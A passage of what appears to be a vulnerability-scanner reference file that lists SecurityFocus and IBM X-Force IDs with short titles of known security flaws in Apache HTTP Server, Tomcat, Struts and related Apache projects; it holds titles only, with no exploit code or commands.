15282| [10736] Apache 'mod_ssl' Log Function Format String Vulnerability
15283| [10619] Apache ap_escape_html Memory Allocation Denial Of Service Vulnerability
15284| [10508] Apache Mod_Proxy Remote Negative Content-Length Buffer Overflow Vulnerability
15285| [10478] ClueCentral Apache Suexec Patch Security Weakness
15286| [10355] Apache 'mod_ssl' 'ssl_util_uuencode_binary()' Stack Buffer Overflow Vulnerability
15287| [10212] Apache mod_auth Malformed Password Potential Memory Corruption Vulnerability
15288| [9933] Apache mod_disk_cache Module Client Authentication Credential Storage Weakness
15289| [9930] Apache Error and Access Logs Escape Sequence Injection Vulnerability
15290| [9921] Apache Connection Blocking Denial Of Service Vulnerability
15291| [9885] Apache Mod_Security Module SecFilterScanPost Off-By-One Buffer Overflow Vulnerability
15292| [9874] Apache HTAccess LIMIT Directive Bypass Configuration Error Weakness
15293| [9829] Apache Mod_Access Access Control Rule Bypass Vulnerability
15294| [9826] Apache Mod_SSL HTTP Request Remote Denial Of Service Vulnerability
15295| [9733] Apache Cygwin Directory Traversal Vulnerability
15296| [9599] Apache mod_php Global Variables Information Disclosure Weakness
15297| [9590] Apache-SSL Client Certificate Forging Vulnerability
15298| [9571] Apache mod_digest Client-Supplied Nonce Verification Vulnerability
15299| [9471] Apache mod_perl Module File Descriptor Leakage Vulnerability
15300| [9404] Mod-Auth-Shadow Apache Module Expired User Credential Weakness
15301| [9302] Apache mod_php Module File Descriptor Leakage Vulnerability
15302| [9129] Apache mod_python Module Malformed Query Denial of Service Vulnerability
15303| [8926] Apache Web Server mod_cgid Module CGI Data Redirection Vulnerability
15304| [8919] Apache Mod_Security Module Heap Corruption Vulnerability
15305| [8911] Apache Web Server Multiple Module Local Buffer Overflow Vulnerability
15306| [8898] Red Hat Apache Directory Index Default Configuration Error
15307| [8883] Apache Cocoon Directory Traversal Vulnerability
15308| [8824] Apache Tomcat Non-HTTP Request Denial Of Service Vulnerability
15309| [8822] Apache Mod_Throttle Module Local Shared Memory Corruption Vulnerability
15310| [8725] Apache2 MOD_CGI STDERR Denial Of Service Vulnerability
15311| [8707] Apache htpasswd Password Entropy Weakness
15312| [8561] Apache::Gallery Insecure Local File Storage Privilege Escalation Vulnerability
15313| [8287] Mod_Mylo Apache Module REQSTR Buffer Overflow Vulnerability
15314| [8226] Apache HTTP Server Multiple Vulnerabilities
15315| [8138] Apache Web Server Type-Map Recursive Loop Denial Of Service Vulnerability
15316| [8137] Apache Web Server Prefork MPM Denial Of Service Vulnerability
15317| [8136] Macromedia Apache Web Server Encoded Space Source Disclosure Vulnerability
15318| [8135] Apache Web Server FTP Proxy IPV6 Denial Of Service Vulnerability
15319| [8134] Apache Web Server SSLCipherSuite Weak CipherSuite Renegotiation Weakness
15320| [7768] Apache Tomcat Insecure Directory Permissions Vulnerability
15321| [7725] Apache Basic Authentication Module Valid User Login Denial Of Service Vulnerability
15322| [7723] Apache APR_PSPrintf Memory Corruption Vulnerability
15323| [7448] Apache Mod_Auth_Any Remote Command Execution Vulnerability
15324| [7375] Apache Mod_Access_Referer NULL Pointer Dereference Denial of Service Vulnerability
15325| [7332] Apache Web Server OS2 Filestat Denial Of Service Vulnerability
15326| [7255] Apache Web Server File Descriptor Leakage Vulnerability
15327| [7254] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
15328| [6943] Apache Web Server MIME Boundary Information Disclosure Vulnerability
15329| [6939] Apache Web Server ETag Header Information Disclosure Weakness
15330| [6722] Apache Tomcat Web.XML File Contents Disclosure Vulnerability
15331| [6721] Apache Tomcat Null Byte Directory/File Disclosure Vulnerability
15332| [6720] Apache Tomcat Example Web Application Cross Site Scripting Vulnerability
15333| [6662] Apache Web Server MS-DOS Device Name Denial Of Service Vulnerability
15334| [6661] Apache Web Server Default Script Mapping Bypass Vulnerability
15335| [6660] Apache Web Server Illegal Character HTTP Request File Disclosure Vulnerability
15336| [6659] Apache Web Server MS-DOS Device Name Arbitrary Code Execution Vulnerability
15337| [6562] Apache Tomcat Invoker Servlet File Disclosure Vulnerability
15338| [6320] Apache/Tomcat Mod_JK Chunked Encoding Denial Of Service Vulnerability
15339| [6117] Apache mod_php File Descriptor Leakage Vulnerability
15340| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
15341| [5996] Apache AB.C Web Benchmarking Buffer Overflow Vulnerability
15342| [5995] Apache AB.C Web Benchmarking Read_Connection() Buffer Overflow Vulnerability
15343| [5993] Multiple Apache HTDigest Buffer Overflow Vulnerabilities
15344| [5992] Apache HTDigest Insecure Temporary File Vulnerability
15345| [5991] Apache HTDigest Arbitrary Command Execution Vulnerability
15346| [5990] Apache HTPasswd Insecure Temporary File Vulnerability
15347| [5981] Multiple Apache HTDigest and HTPassWD Component Vulnerabilites
15348| [5884] Apache Web Server Scoreboard Memory Segment Overwriting SIGUSR1 Sending Vulnerability
15349| [5847] Apache Server Side Include Cross Site Scripting Vulnerability
15350| [5838] Apache Tomcat 3.2 Directory Disclosure Vulnerability
15351| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
15352| [5791] HP VirtualVault Apache mod_ssl Denial Of Service Vulnerability
15353| [5787] Apache Oversized STDERR Buffer Denial Of Service Vulnerability
15354| [5786] Apache Tomcat DefaultServlet File Disclosure Vulnerability
15355| [5542] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
15356| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
15357| [5485] Apache 2.0 Path Disclosure Vulnerability
15358| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
15359| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
15360| [5194] Apache Tomcat DOS Device Name Cross Site Scripting Vulnerability
15361| [5193] Apache Tomcat Servlet Mapping Cross Site Scripting Vulnerability
15362| [5067] Apache Tomcat Null Character Malformed Request Denial Of Service Vulnerability
15363| [5054] Apache Tomcat Web Root Path Disclosure Vulnerability
15364| [5033] Apache Chunked-Encoding Memory Corruption Vulnerability
15365| [4995] Apache Tomcat JSP Engine Denial of Service Vulnerability
15366| [4878] Apache Tomcat RealPath.JSP Malformed Request Information Disclosure Vulnerability
15367| [4877] Apache Tomcat Example Files Web Root Path Disclosure Vulnerability
15368| [4876] Apache Tomcat Source.JSP Malformed Request Information Disclosure Vulnerability
15369| [4575] Apache Tomcat Servlet Path Disclosure Vulnerability
15370| [4557] Apache Tomcat System Path Information Disclosure Vulnerability
15371| [4437] Apache Error Message Cross-Site Scripting Vulnerability
15372| [4431] Apache PrintEnv/Test_CGI Script Injection Vulnerability
15373| [4358] Apache Double-Reverse Lookup Log Entry Spoofing Vulnerability
15374| [4335] Apache Win32 Batch File Remote Command Execution Vulnerability
15375| [4292] Oracle 9iAS Apache PL/SQL Module Web Administration Access Vulnerability
15376| [4189] Apache mod_ssl/Apache-SSL Buffer Overflow Vulnerability
15377| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
15378| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
15379| [4037] Oracle 9iAS Apache PL/SQL Module Denial of Service Vulnerability
15380| [4032] Oracle 9iAS Apache PL/SQL Module Multiple Buffer Overflows Vulnerability
15381| [3796] Apache HTTP Request Unexpected Behavior Vulnerability
15382| [3790] Apache Non-Existent Log Directory Denial Of Service Vulnerability
15383| [3786] Apache Win32 PHP.EXE Remote File Disclosure Vulnerability
15384| [3727] Oracle 9I Application Server PL/SQL Apache Module Directory Traversal Vulnerability
15385| [3726] Oracle 9I Application Server PL/SQL Apache Module Buffer Overflow Vulnerability
15386| [3596] Apache Split-Logfile File Append Vulnerability
15387| [3521] Apache mod_usertrack Predictable ID Generation Vulnerability
15388| [3335] Red Hat Linux Apache Remote Username Enumeration Vulnerability
15389| [3316] MacOS X Client Apache Directory Contents Disclosure Vulnerability
15390| [3256] Apache mod_auth_oracle Remote SQL Query Manipulation Vulnerability
15391| [3255] Apache mod_auth_mysql Remote SQL Query Manipulation Vulnerability
15392| [3254] Apache AuthPG Remote SQL Query Manipulation Vulnerability
15393| [3253] Apache mod_auth_pgsql_sys Remote SQL Query Manipulation Vulnerability
15394| [3251] Apache mod_auth_pgsql Remote SQL Query Manipulation Vulnerability
15395| [3176] Apache Mod ReWrite Rules Bypassing Image Linking Vulnerability
15396| [3169] Apache Server Address Disclosure Vulnerability
15397| [3009] Apache Possible Directory Index Disclosure Vulnerability
15398| [2982] Apache Tomcat Cross-Site Scripting Vulnerability
15399| [2852] MacOS X Client Apache File Protection Bypass Vulnerability
15400| [2740] Apache Web Server HTTP Request Denial of Service Vulnerability
15401| [2518] Apache Tomcat 3.0 Directory Traversal Vulnerability
15402| [2503] Apache Artificially Long Slash Path Directory Listing Vulnerability
15403| [2300] NCSA/Apache httpd ScriptAlias Source Retrieval Vulnerability
15404| [2216] Apache Web Server DoS Vulnerability
15405| [2182] Apache /tmp File Race Vulnerability
15406| [2171] Oracle Apache+WebDB Documented Backdoor Vulnerability
15407| [2060] Apache Web Server with Php 3 File Disclosure Vulnerability
15408| [1821] Apache mod_cookies Buffer Overflow Vulnerability
15409| [1728] Apache Rewrite Module Arbitrary File Disclosure Vulnerability
15410| [1658] SuSE Apache CGI Source Code Viewing Vulnerability
15411| [1656] SuSE Apache WebDAV Directory Listings Vulnerability
15412| [1575] Trustix Apache-SSL RPM Permissions Vulnerability
15413| [1548] Apache Jakarta-Tomcat /admin Context Vulnerability
15414| [1532] Apache Tomcat Snoop Servlet Information Disclosure Vulnerability
15415| [1531] Apache Tomcat 3.1 Path Revealing Vulnerability
15416| [1457] Apache::ASP source.asp Example Script Vulnerability
15417| [1284] Apache HTTP Server (win32) Root Directory Access Vulnerability
15418| [1083] Cobalt Raq Apache .htaccess Disclosure Vulnerability
15419|
15420| IBM X-Force - https://exchange.xforce.ibmcloud.com:
15421| [86258] Apache CloudStack text fields cross-site scripting
15422| [85983] Apache Subversion mod_dav_svn module denial of service
15423| [85875] Apache OFBiz UEL code execution
15424| [85874] Apache OFBiz Webtools View Log screen cross-site scripting
15425| [85871] Apache HTTP Server mod_session_dbd unspecified
15426| [85756] Apache Struts OGNL expression command execution
15427| [85755] Apache Struts DefaultActionMapper class open redirect
15428| [85586] Apache ActiveMQ CVE-2013-1879 cross-site scripting
15429| [85574] Apache HTTP Server mod_dav denial of service
15430| [85573] Apache Struts Showcase App OGNL code execution
15431| [85496] Apache CXF denial of service
15432| [85423] Apache Geronimo RMI classloader code execution
15433| [85326] Apache Santuario XML Security for C++ buffer overflow
15434| [85323] Apache Santuario XML Security for Java spoofing
15435| [85319] Apache Qpid Python client SSL spoofing
15436| [85019] Apache Santuario XML Security for C++ CVE-2013-2156 buffer overflow
15437| [85018] Apache Santuario XML Security for C++ CVE-2013-2155 denial of service
15438| [85017] Apache Santuario XML Security for C++ CVE-2013-2154 buffer overflow
15439| [85016] Apache Santuario XML Security for C++ CVE-2013-2153 spoofing
15440| [84952] Apache Tomcat CVE-2012-3544 denial of service
15441| [84763] Apache Struts CVE-2013-2135 security bypass
15442| [84762] Apache Struts CVE-2013-2134 security bypass
15443| [84719] Apache Subversion CVE-2013-2088 command execution
15444| [84718] Apache Subversion CVE-2013-2112 denial of service
15445| [84717] Apache Subversion CVE-2013-1968 denial of service
15446| [84577] Apache Tomcat security bypass
15447| [84576] Apache Tomcat symlink
15448| [84543] Apache Struts CVE-2013-2115 security bypass
15449| [84542] Apache Struts CVE-2013-1966 security bypass
15450| [84154] Apache Tomcat session hijacking
15451| [84144] Apache Tomcat denial of service
15452| [84143] Apache Tomcat information disclosure
15453| [84111] Apache HTTP Server command execution
15454| [84043] Apache Virtual Computing Lab cross-site scripting
15455| [84042] Apache Virtual Computing Lab cross-site scripting
15456| [83782] Apache CloudStack information disclosure
15457| [83781] Apache CloudStack security bypass
15458| [83720] Apache ActiveMQ cross-site scripting
15459| [83719] Apache ActiveMQ denial of service
15460| [83718] Apache ActiveMQ denial of service
15461| [83263] Apache Subversion denial of service
15462| [83262] Apache Subversion denial of service
15463| [83261] Apache Subversion denial of service
15464| [83259] Apache Subversion denial of service
15465| [83035] Apache mod_ruid2 security bypass
15466| [82852] Apache Qpid federation_tag security bypass
15467| [82851] Apache Qpid qpid::framing::Buffer denial of service
15468| [82758] Apache Rave User RPC API information disclosure
15469| [82663] Apache Subversion svn_fs_file_length() denial of service
15470| [82642] Apache Qpid qpid::framing::Buffer::checkAvailable() denial of service
15471| [82641] Apache Qpid AMQP denial of service
15472| [82626] Apache HTTP Server on Debian GNU/Linux Debian apache2ctl symlink
15473| [82618] Apache Commons FileUpload symlink
15474| [82360] Apache HTTP Server manager interface cross-site scripting
15475| [82359] Apache HTTP Server hostnames cross-site scripting
15476| [82338] Apache Tomcat log/logdir information disclosure
15477| [82328] Apache Maven and Apache Maven Wagon SSL spoofing
15478| [82268] Apache OpenJPA deserialization command execution
15479| [81981] Apache CXF UsernameTokens security bypass
15480| [81980] Apache CXF WS-Security security bypass
15481| [81398] Apache OFBiz cross-site scripting
15482| [81240] Apache CouchDB directory traversal
15483| [81226] Apache CouchDB JSONP code execution
15484| [81225] Apache CouchDB Futon user interface cross-site scripting
15485| [81211] Apache Axis2/C SSL spoofing
15486| [81167] Apache CloudStack DeployVM information disclosure
15487| [81166] Apache CloudStack AddHost API information disclosure
15488| [81165] Apache CloudStack createSSHKeyPair API information disclosure
15489| [80518] Apache Tomcat cross-site request forgery security bypass
15490| [80517] Apache Tomcat FormAuthenticator security bypass
15491| [80516] Apache Tomcat NIO denial of service
15492| [80408] Apache Tomcat replay-countermeasure security bypass
15493| [80407] Apache Tomcat HTTP Digest Access Authentication security bypass
15494| [80317] Apache Tomcat slowloris denial of service
15495| [79984] Apache Commons HttpClient SSL spoofing
15496| [79983] Apache CXF SSL spoofing
15497| [79830] Apache Axis2/Java SSL spoofing
15498| [79829] Apache Axis SSL spoofing
15499| [79809] Apache Tomcat DIGEST security bypass
15500| [79806] Apache Tomcat parseHeaders() denial of service
15501| [79540] Apache OFBiz unspecified
15502| [79487] Apache Axis2 SAML security bypass
15503| [79212] Apache Cloudstack code execution
15504| [78734] Apache CXF SOAP Action security bypass
15505| [78730] Apache Qpid broker denial of service
15506| [78617] Eucalyptus Apache Santuario (XML Security for Java) denial of service
15507| [78563] Apache mod_pagespeed module unspecified cross-site scripting
15508| [78562] Apache mod_pagespeed module security bypass
15509| [78454] Apache Axis2 security bypass
15510| [78452] Websense Web Security and Web Filter Apache Tomcat information disclosure
15511| [78451] Websense Web Security and Web Filter Apache Tomcat cross-site scripting
15512| [78321] Apache Wicket unspecified cross-site scripting
15513| [78183] Apache Struts parameters denial of service
15514| [78182] Apache Struts cross-site request forgery
15515| [78153] Apache Solr Autocomplete module for Drupal autocomplete results cross-site scripting
15516| [77987] mod_rpaf module for Apache denial of service
15517| [77958] Apache Struts skill name code execution
15518| [77914] Apache HTTP Server mod_negotiation module cross-site scripting
15519| [77913] Apache HTTP Server mod_proxy_ajp information disclosure
15520| [77568] Apache Qpid broker security bypass
15521| [77421] Apache Libcloud spoofing
15522| [77059] Oracle Solaris Cluster Apache Tomcat Agent unspecified
15523| [77046] Oracle Solaris Apache HTTP Server information disclosure
15524| [76837] Apache Hadoop information disclosure
15525| [76802] Apache Sling CopyFrom denial of service
15526| [76692] Apache Hadoop symlink
15527| [76535] Apache Roller console cross-site request forgery
15528| [76534] Apache Roller weblog cross-site scripting
15529| [76152] Apache CXF elements security bypass
15530| [76151] Apache CXF child policies security bypass
15531| [75983] MapServer for Windows Apache file include
15532| [75857] Apache Commons Compress and Apache Ant bzip2 denial of service
15533| [75558] Apache POI denial of service
15534| [75545] PHP apache_request_headers() buffer overflow
15535| [75302] Apache Qpid SASL security bypass
15536| [75211] Debian GNU/Linux apache 2 cross-site scripting
15537| [74901] Apache HTTP Server LD_LIBRARY_PATH privilege escalation
15538| [74871] Apache OFBiz FlexibleStringExpander code execution
15539| [74870] Apache OFBiz multiple cross-site scripting
15540| [74750] Apache Hadoop unspecified spoofing
15541| [74319] Apache Struts XSLTResult.java file upload
15542| [74313] Apache Traffic Server header buffer overflow
15543| [74276] Apache Wicket directory traversal
15544| [74273] Apache Wicket unspecified cross-site scripting
15545| [74181] Apache HTTP Server mod_fcgid module denial of service
15546| [73690] Apache Struts OGNL code execution
15547| [73432] Apache Solr extension for TYPO3 unspecified cross-site scripting
15548| [73100] Apache MyFaces in directory traversal
15549| [73096] Apache APR hash denial of service
15550| [73052] Apache Struts name cross-site scripting
15551| [73030] Apache CXF UsernameToken security bypass
15552| [72888] Apache Struts lastName cross-site scripting
15553| [72758] Apache HTTP Server httpOnly information disclosure
15554| [72757] Apache HTTP Server MPM denial of service
15555| [72585] Apache Struts ParameterInterceptor security bypass
15556| [72438] Apache Tomcat Digest security bypass
15557| [72437] Apache Tomcat Digest security bypass
15558| [72436] Apache Tomcat DIGEST security bypass
15559| [72425] Apache Tomcat parameter denial of service
15560| [72422] Apache Tomcat request object information disclosure
15561| [72377] Apache HTTP Server scoreboard security bypass
15562| [72345] Apache HTTP Server HTTP request denial of service
15563| [72229] Apache Struts ExceptionDelegator command execution
15564| [72089] Apache Struts ParameterInterceptor directory traversal
15565| [72088] Apache Struts CookieInterceptor command execution
15566| [72047] Apache Geronimo hash denial of service
15567| [72016] Apache Tomcat hash denial of service
15568| [71711] Apache Struts OGNL expression code execution
15569| [71654] Apache Struts interfaces security bypass
15570| [71620] Apache ActiveMQ failover denial of service
15571| [71617] Apache HTTP Server mod_proxy module information disclosure
15572| [71508] Apache MyFaces EL security bypass
15573| [71445] Apache HTTP Server mod_proxy security bypass
15574| [71203] Apache Tomcat servlets privilege escalation
15575| [71181] Apache HTTP Server ap_pregsub() denial of service
15576| [71093] Apache HTTP Server ap_pregsub() buffer overflow
15577| [70336] Apache HTTP Server mod_proxy information disclosure
15578| [69804] Apache HTTP Server mod_proxy_ajp denial of service
15579| [69472] Apache Tomcat AJP security bypass
15580| [69396] Apache HTTP Server ByteRange filter denial of service
15581| [69394] Apache Wicket multi window support cross-site scripting
15582| [69176] Apache Tomcat XML information disclosure
15583| [69161] Apache Tomcat jsvc information disclosure
15584| [68799] mod_authnz_external module for Apache mysql-auth.pl SQL injection
15585| [68541] Apache Tomcat sendfile information disclosure
15586| [68420] Apache XML Security denial of service
15587| [68238] Apache Tomcat JMX information disclosure
15588| [67860] Apache Rampart/C rampart_timestamp_token_validate security bypass
15589| [67804] Apache Subversion control rules information disclosure
15590| [67803] Apache Subversion control rules denial of service
15591| [67802] Apache Subversion baselined denial of service
15592| [67672] Apache Archiva multiple cross-site scripting
15593| [67671] Apache Archiva multiple cross-site request forgery
15594| [67564] Apache APR apr_fnmatch() denial of service
15595| [67532] IBM WebSphere Application Server org.apache.jasper.runtime.JspWriterImpl.response denial of service
15596| [67515] Apache Tomcat annotations security bypass
15597| [67480] Apache Struts s:submit information disclosure
15598| [67414] Apache APR apr_fnmatch() denial of service
15599| [67356] Apache Struts javatemplates cross-site scripting
15600| [67354] Apache Struts Xwork cross-site scripting
15601| [66676] Apache Tomcat HTTP BIO information disclosure
15602| [66675] Apache Tomcat web.xml security bypass
15603| [66640] Apache HttpComponents HttpClient Proxy-Authorization information disclosure
15604| [66241] Apache HttpComponents information disclosure
15605| [66154] Apache Tomcat ServletSecurity security bypass
15606| [65971] Apache Tomcat ServletSecurity security bypass
15607| [65876] Apache Subversion mod_dav_svn denial of service
15608| [65343] Apache Continuum unspecified cross-site scripting
15609| [65162] Apache Tomcat NIO connector denial of service
15610| [65161] Apache Tomcat javax.servlet.ServletRequest.getLocale() denial of service
15611| [65160] Apache Tomcat HTML Manager interface cross-site scripting
15612| [65159] Apache Tomcat ServletContect security bypass
15613| [65050] Apache CouchDB web-based administration UI cross-site scripting
15614| [64773] Oracle HTTP Server Apache Plugin unauthorized access
15615| [64473] Apache Subversion blame -g denial of service
15616| [64472] Apache Subversion walk() denial of service
15617| [64407] Apache Axis2 CVE-2010-0219 code execution
15618| [63926] Apache Archiva password privilege escalation
15619| [63785] Apache CouchDB LD_LIBRARY_PATH privilege escalation
15620| [63493] Apache Archiva credentials cross-site request forgery
15621| [63477] Apache Tomcat HttpOnly session hijacking
15622| [63422] Apache Tomcat sessionsList.jsp cross-site scripting
15623| [63303] Apache mod_fcgid module fcgid_header_bucket_read() buffer overflow
15624| [62959] Apache Shiro filters security bypass
15625| [62790] Apache Perl cgi module denial of service
15626| [62576] Apache Qpid exchange denial of service
15627| [62575] Apache Qpid AMQP denial of service
15628| [62354] Apache Qpid SSL denial of service
15629| [62235] Apache APR-util apr_brigade_split_line() denial of service
15630| [62181] Apache XML-RPC SAX Parser information disclosure
15631| [61721] Apache Traffic Server cache poisoning
15632| [61202] Apache Derby BUILTIN authentication functionality information disclosure
15633| [61186] Apache CouchDB Futon cross-site request forgery
15634| [61169] Apache CXF DTD denial of service
15635| [61070] Apache Jackrabbit search.jsp SQL injection
15636| [61006] Apache SLMS Quoting cross-site request forgery
15637| [60962] Apache Tomcat time cross-site scripting
15638| [60883] Apache mod_proxy_http information disclosure
15639| [60671] Apache HTTP Server mod_cache and mod_dav denial of service
15640| [60264] Apache Tomcat Transfer-Encoding denial of service
15641| [59746] Apache Axis2 axis2/axis2-admin page session hijacking
15642| [59588] Apache Axis2/Java XML DTD (Document Type Declaration) data denial of service
15643| [59413] Apache mod_proxy_http timeout information disclosure
15644| [59058] Apache MyFaces unencrypted view state cross-site scripting
15645| [58827] Apache Axis2 xsd file include
15646| [58790] Apache Axis2 modules cross-site scripting
15647| [58299] Apache ActiveMQ queueBrowse cross-site scripting
15648| [58169] Apache Tomcat Web Application Manager / Host Manager cross-site request forgery
15649| [58056] Apache ActiveMQ .jsp source code disclosure
15650| [58055] Apache Tomcat realm name information disclosure
15651| [58046] Apache HTTP Server mod_auth_shadow security bypass
15652| [57841] Apache Open For Business Project (OFBiz) subject cross-site scripting
15653| [57840] Apache Open For Business Project (OFBiz) multiple parameters cross-site scripting
15654| [57429] Apache CouchDB algorithms information disclosure
15655| [57398] Apache ActiveMQ Web console cross-site request forgery
15656| [57397] Apache ActiveMQ createDestination.action cross-site scripting
15657| [56653] Apache HTTP Server DNS spoofing
15658| [56652] Apache HTTP Server DNS cross-site scripting
15659| [56625] Apache HTTP Server request header information disclosure
15660| [56624] Apache HTTP Server mod_isapi orphaned callback pointer code execution
15661| [56623] Apache HTTP Server mod_proxy_ajp denial of service
15662| [55941] mod_proxy module for Apache ap_proxy_send_fb() buffer overflow
15663| [55857] Apache Tomcat WAR files directory traversal
15664| [55856] Apache Tomcat autoDeploy attribute security bypass
15665| [55855] Apache Tomcat WAR directory traversal
15666| [55210] Intuit component for Joomla! Apache information disclosure
15667| [54533] Apache Tomcat 404 error page cross-site scripting
15668| [54182] Apache Tomcat admin default password
15669| [53878] Apache Solr Search (solr) extension for TYPO3 unspecified cross-site scripting
15670| [53666] Apache HTTP Server Solaris pollset support denial of service
15671| [53650] Apache HTTP Server HTTP basic-auth module security bypass
15672| [53124] mod_proxy_ftp module for Apache HTTP header security bypass
15673| [53041] mod_proxy_ftp module for Apache denial of service
15674| [52540] Apache Portable Runtime and Apache Portable Utility library multiple buffer overflow
15675| [51953] Apache Tomcat Path Disclosure
15676| [51952] Apache Tomcat Path Traversal
15677| [51951] Apache stronghold-status Information Disclosure
15678| [51950] Apache stronghold-info Information Disclosure
15679| [51949] Apache PHP Source Code Disclosure
15680| [51948] Apache Multiviews Attack
15681| [51946] Apache JServ Environment Status Information Disclosure
15682| [51945] Apache error_log Information Disclosure
15683| [51944] Apache Default Installation Page Pattern Found
15684| [51943] Apache AXIS XML Parser echoheaders.jws Sample Web Service Denial of Service
15685| [51942] Apache AXIS XML External Entity File Retrieval
15686| [51941] Apache AXIS Sample Servlet Information Leak
15687| [51940] Apache access_log Information Disclosure
15688| [51626] Apache mod_deflate denial of service
15689| [51532] mod_proxy module for the Apache HTTP Server stream_reqbody_cl denial of service
15690| [51365] Apache Tomcat RequestDispatcher security bypass
15691| [51273] Apache HTTP Server Incomplete Request denial of service
15692| [51195] Apache Tomcat XML information disclosure
15693| [50994] Apache APR-util xml/apr_xml.c denial of service
15694| [50993] Apache APR-util apr_brigade_vprintf denial of service
15695| [50964] Apache APR-util apr_strmatch_precompile() denial of service
15696| [50930] Apache Tomcat j_security_check information disclosure
15697| [50928] Apache Tomcat AJP denial of service
15698| [50884] Apache HTTP Server XML ENTITY denial of service
15699| [50808] Apache HTTP Server AllowOverride privilege escalation
15700| [50108] Apache Struts s:a tag and s:url tag cross-site scripting
15701| [50059] Apache mod_proxy_ajp information disclosure
15702| [49951] Apache Tiles Expression Language (EL) expressions cross-site scripting
15703| [49925] Apache Geronimo Web Administrative Console cross-site request forgery
15704| [49924] Apache Geronimo console/portal/Server/Monitoring cross-site scripting
15705| [49921] Apache ActiveMQ Web interface cross-site scripting
15706| [49898] Apache Geronimo Services/Repository directory traversal
15707| [49725] Apache Tomcat mod_jk module information disclosure
15708| [49715] Apache mod_perl Apache::Status and Apache2::Status modules cross-site scripting
15709| [49712] Apache Struts unspecified cross-site scripting
15710| [49213] Apache Tomcat cal2.jsp cross-site scripting
15711| [48934] Apache Tomcat POST doRead method information disclosure
15712| [48211] Apache Tomcat header HTTP request smuggling
15713| [48163] libapache2-mod-auth-mysql module for Debian multibyte encoding SQL injection
15714| [48110] Apache Jackrabbit search.jsp and swr.jsp cross-site scripting
15715| [47709] Apache Roller "
15716| [47104] Novell Netware ApacheAdmin console security bypass
15717| [47086] Apache HTTP Server OS fingerprinting unspecified
15718| [46329] Apache Struts FilterDispatcher and DefaultStaticContentLoader class directory traversal
15719| [45791] Apache Tomcat RemoteFilterValve security bypass
15720| [44435] Oracle WebLogic Apache Connector buffer overflow
15721| [44411] Apache Tomcat allowLinking UTF-8 directory traversal
15722| [44223] Apache HTTP Server mod_proxy_ftp cross-site scripting
15723| [44156] Apache Tomcat RequestDispatcher directory traversal
15724| [44155] Apache Tomcat HttpServletResponse.sendError() cross-site scripting
15725| [43885] Oracle WebLogic Server Apache Connector buffer overflow
15726| [42987] Apache HTTP Server mod_proxy module denial of service
15727| [42915] Apache Tomcat JSP files path disclosure
15728| [42914] Apache Tomcat MS-DOS path disclosure
15729| [42892] Apache Tomcat unspecified unauthorized access
15730| [42816] Apache Tomcat Host Manager cross-site scripting
15731| [42303] Apache 403 error cross-site scripting
15732| [41618] Apache-SSL ExpandCert() authentication bypass
15733| [40761] Apache Derby RDBNAM parameter and DatabaseMetaData.getURL information disclosure
15734| [40736] Apache Tomcat HTTP/1.1 connector information disclosure
15735| [40614] Apache mod_jk2 HTTP Host header buffer overflow
15736| [40562] Apache Geronimo init information disclosure
15737| [40478] Novell Web Manager webadmin-apache.conf security bypass
15738| [40411] Apache Tomcat exception handling information disclosure
15739| [40409] Apache Tomcat native (APR based) connector weak security
15740| [40403] Apache Tomcat quotes and %5C cookie information disclosure
15741| [40388] Sun Java Plug-In org.apache.crimson.tree.XmlDocument security bypass
15742| [39893] Apache HTTP Server mod_negotiation HTTP response splitting
15743| [39867] Apache HTTP Server mod_negotiation cross-site scripting
15744| [39804] Apache Tomcat SingleSignOn information disclosure
15745| [39615] Apache HTTP Server mod_proxy_ftp.c UTF-7 cross-site scripting
15746| [39612] Apache HTTP Server mod_proxy_balancer buffer overflow
15747| [39608] Apache HTTP Server balancer manager cross-site request forgery
15748| [39476] Apache mod_proxy_balancer balancer_handler function denial of service
15749| [39474] Apache HTTP Server mod_proxy_balancer cross-site scripting
15750| [39472] Apache HTTP Server mod_status cross-site scripting
15751| [39201] Apache Tomcat JULI logging weak security
15752| [39158] Apache HTTP Server Windows SMB shares information disclosure
15753| [39001] Apache HTTP Server mod_imap and mod_imagemap module cross-site scripting
15754| [38951] Apache::AuthCAS Perl module cookie SQL injection
15755| [38800] Apache HTTP Server 413 error page cross-site scripting
15756| [38211] Apache Geronimo SQLLoginModule authentication bypass
15757| [37243] Apache Tomcat WebDAV directory traversal
15758| [37178] RHSA update for Apache HTTP Server mod_status module cross-site scripting not installed
15759| [37177] RHSA update for Apache HTTP Server Apache child process denial of service not installed
15760| [37119] RHSA update for Apache mod_auth_kerb off-by-one buffer overflow not installed
15761| [37100] RHSA update for Apache and IBM HTTP Server Expect header cross-site scripting not installed
15762| [36782] Apache Geronimo MEJB unauthorized access
15763| [36586] Apache HTTP Server UTF-7 cross-site scripting
15764| [36468] Apache Geronimo LoginModule security bypass
15765| [36467] Apache Tomcat functions.jsp cross-site scripting
15766| [36402] Apache Tomcat calendar cross-site request forgery
15767| [36354] Apache HTTP Server mod_proxy module denial of service
15768| [36352] Apache HTTP Server ap_proxy_date_canon() denial of service
15769| [36336] Apache Derby lock table privilege escalation
15770| [36335] Apache Derby schema privilege escalation
15771| [36006] Apache Tomcat "
15772| [36001] Apache Tomcat Host Manager Servlet alias cross-site scripting
15773| [35999] Apache Tomcat \"
15774| [35795] Apache Tomcat CookieExample cross-site scripting
15775| [35536] Apache Tomcat SendMailServlet example cross-site scripting
15776| [35384] Apache HTTP Server mod_cache module denial of service
15777| [35097] Apache HTTP Server mod_status module cross-site scripting
15778| [35095] Apache HTTP Server Prefork MPM module denial of service
15779| [34984] Apache HTTP Server recall_headers information disclosure
15780| [34966] Apache HTTP Server MPM content spoofing
15781| [34965] Apache HTTP Server MPM information disclosure
15782| [34963] Apache HTTP Server MPM multiple denial of service
15783| [34872] Apache MyFaces Tomahawk autoscroll parameter cross-site scripting
15784| [34869] Apache Tomcat JSP example Web application cross-site scripting
15785| [34868] Apache Tomcat Manager and Host Manager cross-site scripting
15786| [34496] Apache Tomcat JK Connector security bypass
15787| [34377] Apache Tomcat hello.jsp cross-site scripting
15788| [34212] Apache Tomcat SSL configuration security bypass
